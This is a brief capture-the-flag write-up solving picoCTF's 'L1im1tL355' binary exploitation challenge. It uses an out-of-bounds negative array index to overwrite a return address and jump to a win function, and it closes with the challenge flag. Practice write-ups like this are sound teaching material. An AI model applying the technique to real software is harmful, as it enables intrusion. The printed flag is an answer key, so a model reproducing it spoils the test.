L1im1tL355
Binary Exploitation - Points: 400
Just pwn this program and get a flag.
Get the address of the win
function:
$ objdump -d vuln| grep win
080485c6 <win>:
Convert the address to decimal: 134514118
Now write the value at array position -5
to overwrite RIP
of the replaceIntegerInArrayAtIndex
function call to return to the win
function :))
flag: picoCTF{str1nG_CH3353_3fe0db39}